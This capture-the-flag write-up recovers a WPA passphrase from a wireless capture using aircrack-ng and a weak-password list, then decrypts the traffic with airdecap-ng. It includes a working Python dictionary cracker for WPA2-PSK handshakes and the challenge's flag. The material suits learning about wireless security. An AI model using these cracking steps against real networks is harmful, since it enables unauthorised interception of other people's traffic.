Hopefully, we succeeded in spying on some wireless communications around the Sciteek
building; our technical staff has attached the capture file. Will you be able
to exploit it? We hope that some valuable files were exchanged during the
capture.
Please entitle your reply “captured file”, as usual. By the way, your account has been credited with $1000.
Summary: WPA traffic decryption
Here we have a pcap file with an 802.11 (wireless) traffic dump. The data frames are encrypted, but the capture contains a WPA handshake, so let's try a dictionary attack with aircrack-ng:
$ aircrack-ng sciteekadm.cap -w 500-worst-passwords.txt
Opening sciteekadm.cap
Read 345 packets.

   #  BSSID              ESSID                     Encryption

   1  40:FC:89:E0:FF:D3  Sciteek-adm               WPA (1 handshake)

Choosing first network as target.

Opening sciteekadm.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1

                   [00:00:00] 4 keys tested (300.98 k/s)

                          KEY FOUND! [ 12345678 ]
Password found! But sadly, Wireshark can't decrypt the traffic with it: it needs the EAPOL (4-way handshake) packets to derive the session key, and in this capture they are corrupted/missing.
But there is a nice tool called airdecap-ng, which only needs the passphrase and the ESSID (thanks to @kyprizel):
$ airdecap-ng -p 12345678 sciteekadm.cap -e Sciteek-adm
Total number of packets read           345
Total number of WEP data packets         0
Total number of WPA data packets        55
Number of plaintext data packets         0
Number of decrypted WEP  packets         0
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets        41

$ wireshark sciteekadm-dec.cap
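What aircrack-ng did in the first step, and what airdecap-ng repeats with the recovered passphrase, is the WPA/WPA2-PSK key schedule: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID), PTK = PRF-384(PMK, MACs, nonces), and a MIC over EAPOL message 2 that a candidate passphrase either reproduces or does not. The script below is an added example written for this writeup, not code from the page or from the aircrack-ng project. It uses the ESSID and BSSID from the capture, but the client MAC, the nonces, the RSN IE and the wordlist are constructed inline so that it runs offline; the EAPOL message 2 is built from the known passphrase and then cracked back from a small wordlist.

```python
import hashlib
import hmac

# Layout of an EAPOL-Key frame (802.1X header + RSN key descriptor):
#   0..3   EAPOL header (version, type=3, body length)
#   4      descriptor type (2 = RSN)
#   5..6   key information (low 3 bits = key descriptor version)
#   7..8   key length
#   9..16  replay counter
#   17..48 key nonce
#   49..64 key IV
#   65..72 key RSC
#   73..80 key ID
#   81..96 key MIC
#   97..98 key data length, followed by key data
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-384 from 802.11i: PTK = KCK(16) | KEK(16) | TK(16) for CCMP."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(3):  # ceil(384 / 160) HMAC-SHA1 blocks, then truncate to 48 bytes
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:48]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed; algorithm
    chosen by the key descriptor version in the Key Information field."""
    version = int.from_bytes(frame[5:7], "big") & 0x7
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    if version == 1:      # WPA/TKIP: HMAC-MD5
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:      # WPA2/CCMP: HMAC-SHA1-128
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version %d" % version)


def build_eapol_key_frame(key_info: int, replay: int, nonce: bytes, key_data: bytes,
                          mic: bytes = b"\x00" * 16) -> bytes:
    body = (bytes([2]) + key_info.to_bytes(2, "big") + (16).to_bytes(2, "big")
            + replay.to_bytes(8, "big") + nonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
            + mic + len(key_data).to_bytes(2, "big") + key_data)
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_m2, wordlist):
    """Dictionary attack: the candidate whose KCK reproduces the captured MIC wins."""
    target_mic = eapol_m2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_m2), target_mic):
            return candidate
    return None


# Values from the capture: ESSID and BSSID.  Everything else below is constructed.
SSID = "Sciteek-adm"
AP_MAC = bytes.fromhex("40fc89e0ffd3")
STA_MAC = bytes.fromhex("001122334455")      # constructed client MAC
ANONCE = bytes(range(0x10, 0x30))            # constructed 32-byte nonces
SNONCE = bytes(range(0xa0, 0xc0))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2-PSK/CCMP
KEY_INFO_M2 = 0x010a                         # version 2, pairwise, MIC bit set
WORDLIST = ["password", "qwerty", "12345678", "letmein"]   # stand-in for 500-worst-passwords.txt


def make_sample_handshake(passphrase: str) -> bytes:
    """Construct EAPOL message 2 as the client would send it for this passphrase."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    frame = build_eapol_key_frame(KEY_INFO_M2, 1, SNONCE, RSN_IE)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


SAMPLE_M2 = make_sample_handshake("12345678")

if __name__ == "__main__":
    print("KEY FOUND!", crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, SAMPLE_M2, WORDLIST))
```

One PBKDF2 with 4096 iterations per candidate is the whole cost of the attack, which is why aircrack-ng reports keys per second and why a passphrase sitting in a 500-entry wordlist falls in well under a second.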
Now we can simply extract the file from the TCP session in the decrypted capture (for example with Wireshark's Follow TCP Stream):
The flag: 7e4ef92d1472fa1a2d41b2d3c1d2b77a
1 comment
What an elegant solution it turns out to be, if you know the right software :)